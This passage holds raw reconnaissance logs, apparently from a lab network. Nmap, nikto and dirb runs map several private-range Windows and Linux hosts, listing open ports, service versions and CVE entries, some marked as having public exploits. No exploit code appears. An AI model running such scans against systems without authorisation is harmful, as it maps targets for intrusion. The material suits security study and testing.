| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.54 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.144 -oA machines/192_168_110_144/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 11:48 CET
Nmap scan report for 192.168.110.144
Host is up (0.00066s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/26%OT=135%CT=1%CU=40004%PV=Y%DS=2%DC=I%G=Y%TM=6381E
OS:F37%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%TI=I%TS=U)OPS(O1=M5B4
OS:NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%O5=M5B4NW8NNS%O6=M5B4NNS)W
OS:IN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=F
OS:FFF%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T
OS:3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N
OS:)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.70 seconds
nikto -h 192.168.110.144:5357
---------------------------------------------------------------------------
+ Target IP: 192.168.110.144
+ Target Hostname: 192.168.110.144
+ Target Port: 5357
+ Start Time: 2022-12-11 07:16:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7916 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-12-11 07:18:27 (GMT1) (139 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.110.144:5357 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:16:16 2022
URL_BASE: http://192.168.110.144:5357/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.144:5357/ ----
-----------------
END_TIME: Sun Dec 11 07:18:26 2022
DOWNLOADED: 9224 - FOUND: 0
sudo nmap 192.168.110.144 -sV -oA 192_168_110_144/enumeration/nmap/vuln --script vuln -T5 -p135,139,445,5357,49664-49668,49670,49672
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:23 CET
Nmap scan report for 192.168.110.144
Host is up (0.00093s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.71 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.250 -oA machines/192_168_110_250/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:45 CET
Nmap scan report for 192.168.110.250
Host is up (0.00052s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=22%CT=1%CU=40171%PV=Y%DS=2%DC=I%G=Y%TM=6378B3
OS:C7%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS(O1=
OS:M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7
OS:%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y
OS:%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.250 -oA machines/192_168_110_250/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Warning: 192.168.110.250 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.250
Host is up (0.00078s latency).
Not shown: 982 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
64/udp open|filtered tcpwrapped
96/udp open|filtered tcpwrapped
146/udp open|filtered tcpwrapped
159/udp open|filtered tcpwrapped
254/udp open|filtered tcpwrapped
325/udp open|filtered tcpwrapped
377/udp open|filtered tcpwrapped
434/udp open|filtered tcpwrapped
530/udp open|filtered tcpwrapped
573/udp open|filtered tcpwrapped
693/udp open|filtered tcpwrapped
701/udp open|filtered tcpwrapped
847/udp open|filtered tcpwrapped
873/udp open|filtered tcpwrapped
942/udp open|filtered tcpwrapped
958/udp open|filtered tcpwrapped
982/udp open|filtered tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1061.48 seconds
sudo nmap 192.168.110.250 -sV -oA 192_168_110_250/enumeration/nmap/vuln --script vuln -T5 -p22,53
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:09 CET
Nmap scan report for 192.168.110.250
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| vulners:
| cpe:/a:isc:bind:9.16.1:
| CVE-2021-25216 6.8 https://vulners.com/cve/CVE-2021-25216
| CVE-2020-8625 6.8 https://vulners.com/cve/CVE-2020-8625
| PACKETSTORM:157836 5.0 https://vulners.com/packetstorm/PACKETSTORM:157836 *EXPLOIT*
| FBC03933-7A65-52F3-83F4-4B2253A490B6 5.0 https://vulners.com/githubexploit/FBC03933-7A65-52F3-83F4-4B2253A490B6 *EXPLOIT*
| CVE-2021-25220 5.0 https://vulners.com/cve/CVE-2021-25220
| CVE-2021-25219 5.0 https://vulners.com/cve/CVE-2021-25219
| CVE-2021-25215 5.0 https://vulners.com/cve/CVE-2021-25215
| CVE-2020-8620 5.0 https://vulners.com/cve/CVE-2020-8620
| CVE-2020-8616 5.0 https://vulners.com/cve/CVE-2020-8616
| CVE-2020-8623 4.3 https://vulners.com/cve/CVE-2020-8623
| CVE-2020-8621 4.3 https://vulners.com/cve/CVE-2020-8621
| CVE-2020-8617 4.3 https://vulners.com/cve/CVE-2020-8617
| 1337DAY-ID-34485 4.3 https://vulners.com/zdt/1337DAY-ID-34485 *EXPLOIT*
| CVE-2021-25214 4.0 https://vulners.com/cve/CVE-2021-25214
| CVE-2020-8624 4.0 https://vulners.com/cve/CVE-2020-8624
| CVE-2020-8622 4.0 https://vulners.com/cve/CVE-2020-8622
| CVE-2020-8619 4.0 https://vulners.com/cve/CVE-2020-8619
| CVE-2020-8618 4.0 https://vulners.com/cve/CVE-2020-8618
| CVE-2022-38178 0.0 https://vulners.com/cve/CVE-2022-38178
| CVE-2022-38177 0.0 https://vulners.com/cve/CVE-2022-38177
|_ CVE-2022-2795 0.0 https://vulners.com/cve/CVE-2022-2795
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds